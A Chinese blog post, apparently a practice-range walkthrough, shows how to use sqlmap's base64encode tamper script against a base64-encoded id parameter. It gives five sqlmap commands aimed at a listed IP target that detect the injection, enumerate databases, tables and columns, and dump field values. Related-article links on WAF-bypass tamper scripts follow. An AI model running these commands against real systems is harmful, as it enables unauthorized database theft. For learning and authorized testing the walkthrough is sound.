SQL注入实战————2、SQLmap中的temper使用

最新推荐文章于 2024-05-22 11:02:40 发布
最新推荐文章于 2024-05-22 11:02:40 发布
阅读量2.6k 收藏 9
点赞数 3
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Fly_hps/article/details/80208649
版权

SQLmap——tamper注入

靶机地址:http://219.153.49.228:42272/show.php?id=MQ==

首先可以看到该URL中存在一个参数“MQ==”,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密


发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面使用sqlmap的tamper来实现注入

1、判断是否可以注入

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode



2、爆数据库

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode --dbs

3、爆表名

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode -D test --tables


4、爆字段名

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode -D test -T data --columns



5、爆字段值

sqlmap -u http://219.153.49.228:42272/show.php?id=1 --tamper=base64encode -D test -T data -C id,main,thekey,title --dump



至此该演示结束,对于其他的tamper的使用方法也是这样,不再多说,有兴趣的可以去差寻一下tamper的各个脚本对应的信息内容!


FLy_鹏程万里
关注
  • 3
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入使用brupSuite辅助注入、sqlmap使用
05-30
SQL注入使用brupSuite辅助注入、sqlmap使用
sqlmap文手册-sql注入自动化测试工具
07-19
sql注入自动化测试工具sqlmap的操作手册,文版,值得拥有哦。Web安全测试必备工具。
sql注入之tamper绕过WAF防火墙
weixin_33974433的博客
07-31 398
### 现象: 当我们注入的时候,发现有狗,有waf,真的是我的小心脏都碎掉了!!但是呢,很多时候还是得静下来分析过滤系统到底过滤了哪些参数,该如何绕过。利用sqlmap的tamper给我们带来了很多防过滤的脚本绕过。 提示“输入内容存在危险字符,已经被拦截” 提示“请不要尝试在参数包含非法字符尝试注入” ### 判断我们使用那种脚本 1,id...
SQL注入工具sqlmap使用手记
Lisam Blog
05-08 1795
转自:http://blog.sina.com.cn/s/blog_72cbda320101966m.html 1.sqlmap的get注入 假设目标是 http://www.baidu.com/news.php?id=1&data=2 sqlmap语句 列库 sqlmap.py -u "http://www.baidu.com/news.php?id=1&data=2" --dbs
sqlmap 使用tamper脚本绕过WAF
最新发布
xf3401837266的博客
05-22 691
sqlmap 使用tamper脚本绕过WAF
sql注入-WAF绕过】编写sqlmap的tamper进行sql注入
06-29 6062
【特征】特殊符号+十六进制格式
day27 SQL注入&Tamper脚本
wanjia01的博客
10-15 891
小迪安全笔记
SQL注入技巧拓展】————14、Bypass 360主机卫士SQL注入防御(附tamper脚本)
Fly_鹏程万里
12-25 438
0x01 前言   在测试过程,经常会遇到一些主机防护软件,对这方面做了一些尝试,可成功bypass了GET和POST的注入防御,分享一下姿势。 0x02 环境搭建 Windows Server 2003+phpStudy sql注入点测试代码: sql.php <?php $con = mysql_connect("localhost","root","root"); ...
详解强大的SQL注入工具——SQLMAP
05-09
这是一个审计数据库安全的SQL注入工具的使用指南, 该工具在windows平台与linux平台下均可以使用。数据库管理员(DBA)可用它来检 验自己的数据库是否存在安全配置方面的漏洞。
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx)...
day27WEB攻防-通用漏洞&SQL注入&常见SQL注入类型&Tamper脚本的使用
m0_69583059的博客
01-18 1446
如果在实战我们遇到了这样的问题应该如何解决,这里我们可以采用宽字节绕过,就是借助一些繁体字符或者乱码字符来占用字节位数,从而尝试绕过,例如,如果对单引号'进行了转义,我们可以通过在单引号前面加上%df来占用转义符号,没有了转义字符传入的数据就是正常的了。开发程序里面,数字不需要单引号,字符需要单引号,双引号去概括的,在注入的时候,需要考虑到符号的闭合,才能正确去执行SQL,完成注入。在注入的过程,会遇到一些复杂的注入(waf绕过,过滤,编码等),tamper脚本可以尝试绕过。
sqlmap之(四)----Mysql注入实战
fendo
02-27 5246
(1) 查找数据库 sqlmap.py -u "http://localhost/sqls/index.php?id=123" --dbs 数据库有8个。 (2) 通过第一步的数据库查找表(假如数据库名为test) sqlmap.py -u "http://localhost/sqls/index.php?id=123" -D test --ta
第27天:WEB攻防-通用漏洞&SQL注入&Tamper脚本&Base64&Json&md5等
wuqingsix的博客
11-19 514
不同payload类型的注入方式构造:字符型,搜索形 ,加密,编码形。宽字节的构造和绕过, sqlmap的tamper字典使用
sqlmap实战
中国好利鹏
10-31 1671
昨天看sqlmap教程的时候,羽翼给我们提供了一个测试站点http://www.slibrary.com/link.php? id=321。我就想了想,都好几年了,这个站肯定修复好了。然后测试了一下, http://www.slibrary.com/link.php?id=321‘ http://www.slibrary.com/link.php?id=321 and 1=1 ht
kali攻防第6章 SQLMAP介绍及ASP网站渗透
安全参透之旅
11-30 1879
SQLMAP介绍及ASP网站渗透 准备工具 1、kali_linux系统 IP= 10.10.10.131 3、Sqlpmap 入注工具     步骤: -u  “检测是否存在注入” 返回数据库的名字  2、 3、 4、   参数解释: 1、user 根据经验  确定这是用户表 2、--columns   猜列表名  根据u
kali攻防第14章 SQLMAP之漏洞服务器
安全参透之旅
12-29 2723
SQLMAP之漏洞服务器 准备工具 1、kali 系统IP 10.10.10.131 2、受害网站 3、使用工具sqlmap     步骤: 1、登录受害网站 网址设置为 出现Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in E:\WWW\techdetai
SQLMap
每天早起吃早餐
03-20 5871
概念 1. 什么是SQL注入?[1] SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,比如将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透最常用的攻击技术,但是其实SQL注入可以用来
工具使用|神器Sqlmap tamper使用介绍
weixin_42282189的博客
11-21 3343
作者: 村里的小四 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x01 前言 从开源软件Sqlmap学习字符的篡改,现在的web网络环境参数出入处基本都会过滤某些字符串,我们在进行sql注入时,Sqlmap这款Sql注入神器的插件就可以帮助我们(Tamper)篡改字符,实现绕过,以下为实战常用的Tamper,建议收藏。 Sqlmap下载地址:https://github.com/sqlmapproject/sqlmap 0x02 常用Tamper 用法这里就不过多介绍了.
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
“通过sqlnamp检测sql注入漏洞的随堂笔记,包括安装SQLmap和DVWA,以及SQL注入的概述和SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段插入恶意SQL代码,来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

FLy_鹏程万里

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值